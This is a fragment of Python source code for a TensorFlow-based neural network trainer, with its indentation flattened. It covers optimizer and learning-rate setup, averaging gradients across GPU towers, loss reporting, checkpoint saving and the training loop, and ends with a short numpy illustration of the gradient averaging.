            # named 'x' rather than 'global_step', just to make life more difficult
step_name = 'x'
else:
step_name = 'global_step'
params[step_name] = self.num_epochs
log.debug(
'Using learning rate {!r} with params {}.'
.format(lr_class.__name__, params))
return lr_class(**params)
@memoize_property
def optimizer(self):
params = self.config.train.optimizer
optimizer_class, params = object_from_params(params)
log.debug('Using optimizer {!r}.'.format(optimizer_class.__name__))
return optimizer_class(self.learning_rate, **params)
@staticmethod
def _average_gradients(tower_grads):
tower_grads = list(tower_grads)
if len(tower_grads) == 1:
return tower_grads[0]
average_grads = []
for grad_and_vars in zip(*tower_grads):
grads = []
for g, v in grad_and_vars:
# add 0 dimension to the gradients to represent the tower
if g is None:
raise ValueError(
'Gradient for variable {} is None, please check '
'connection.'.format(v))
g = tf.expand_dims(g, 0)
grads.append(g)
# average over the 'tower' dimension.
grad = tf.concat(axis=0, values=grads)
grad = tf.reduce_mean(grad, 0)
# simply return the first tower's pointer to the Variable
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
return average_grads
@staticmethod
def _loss_formatter(key, name):
def formatter(estimator):
loss_mean, loss_std = estimator.get_mean_std(key)
if math.isnan(loss_mean):
raise ValueError('Model diverged with a nan-valued loss.')
loss_std = '±{}'.format(Percent(loss_std / loss_mean))
return '{}: {:10f}{:5}'.format(name, loss_mean, loss_std)
return formatter
@memoize_method
def _losses_and_gradients(self):
formatter = self._loss_formatter('regularization', 'regu')
regularization = self.get_collection(
tf.GraphKeys.REGULARIZATION_LOSSES, first_gpu=True)
if regularization:
self.estimator.register(
tf.add_n(regularization), 'regularization',
formatter=formatter)
def gradient(net, prediction, truth):
loss = [self.task.train(net, prediction, truth)] + regularization
loss = tf.add_n(loss)
return loss, self.optimizer.compute_gradients(loss)
tower_losses, tower_grads = zip(*self.task.map(gradient))
return tower_losses, self._average_gradients(tower_grads)
def _setup_train_operation(self):
ops = {}
self._losses, gradients = self._losses_and_gradients()
self._mean_loss = tf.reduce_mean(self._losses)
ops['app_grad'] = self.optimizer.apply_gradients(gradients)
# update ops
update_ops = list(self.get_collection(tf.GraphKeys.UPDATE_OPS))
ops['update'] = tf.group(*update_ops, name='update')
log.debug('Using update operations: {}'.format(update_ops))
log.debug('Using training operations: {}'.format(ops))
if self.extra_train_ops:
ops['extra'] = self.extra_train_ops
self._train_op = ops
def _init(self):
self.load_checkpoint(self.config.system.checkpoint.load)
formatter = self._loss_formatter('loss', 'loss')
self.estimator.register(self._mean_loss, 'loss', formatter=formatter)
def reset_num_epochs(self):
        log.info('Resetting number of training epochs of the model...')
self.run(self.imgs_seen.initializer)
self.change.reset('checkpoint.epoch')
self.change.reset('step')
def once(self):
train_op = self._train_op if self._run_train_ops else []
tasks = [train_op, self.num_epochs]
_, num_epochs = self.run(tasks, batch=True)
return num_epochs
def overriders_assign(self):
log.info('Assigning overridden values of parameters to parameters...')
self._overriders_call('assign')
def overriders_update(self):
log.info('Updating overrider internal variables...')
self._overriders_call('update')
def overriders_reset(self):
log.info('Resetting overriders internal variables...')
self._overriders_call('reset')
def _iteration(self, max_epochs=None):
system = self.config.system
epoch = self.once()
floor_epoch = math.floor(epoch)
cp_interval = system.checkpoint.get('save.interval', 0)
if self.change.every('checkpoint.epoch', floor_epoch, cp_interval):
log.info(
'Saving checkpoint at epoch {}...'.format(epoch), update=True)
with log.demote():
self.save_checkpoint(floor_epoch)
self._checkpoint_epoch = floor_epoch
max_epochs = max_epochs or system.max_epochs
if max_epochs and epoch >= max_epochs:
log.info(
'Maximum epoch count {} reached.'.format(max_epochs))
if self._checkpoint_epoch and floor_epoch > self._checkpoint_epoch:
log.info('Saving final checkpoint...')
self.save_checkpoint(floor_epoch)
return False
return True
def train(self, max_epochs=None):
# final debug outputs
lr = self.run(self.learning_rate)
log.info('Training start with a learning rate {}.'.format(lr))
try:
# train iterations
while self._iteration(max_epochs=max_epochs):
pass
except KeyboardInterrupt:
log.info('Stopped.')
save = self.config.system.checkpoint.get('save', {})
if save:
countdown = save.get('countdown', 0)
if log.countdown('Saving checkpoint', countdown):
self.save_checkpoint('latest')
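# Hedged illustration (added; not part of mayo): _average_gradients above stacks the
# per-tower gradients for each variable, averages them element-wise, and keeps the
# first tower's variable handle. The same reduction with plain numpy arrays, assuming
# two towers of (gradient, variable) pairs:
if __name__ == '__main__':
    import numpy as np
    tower_grads = [
        [(np.array([1.0, 2.0]), 'w'), (np.array([0.5]), 'b')],  # tower 0
        [(np.array([3.0, 4.0]), 'w'), (np.array([1.5]), 'b')],  # tower 1
    ]
    averaged = [
        (np.stack([g for g, _ in pairs]).mean(axis=0), pairs[0][1])
        for pairs in zip(*tower_grads)
    ]
    print(averaged)  # -> [(array([2., 3.]), 'w'), (array([1.]), 'b')]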
|